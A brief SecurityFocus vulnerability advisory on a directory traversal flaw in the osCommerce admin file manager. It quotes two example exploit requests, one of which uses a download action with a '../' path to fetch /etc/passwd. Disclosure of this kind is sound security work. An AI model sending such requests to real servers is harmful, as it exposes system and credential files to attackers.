osCommerce File Manager Directory Traversal Vulnerability

No exploit is required, but Rene <l0om@excluded.org> suggested that an appropriate request to exploit this vulnerability could be:

file_manager.php?action=download&filename=../../../../../../etc/passwd

An additional exploit was provided by Megasky <magasky@hotmail.com>:

/admin/file_manager.php?action=read&filename=../../../../


 

Privacy Statement
Copyright 2010, SecurityFocus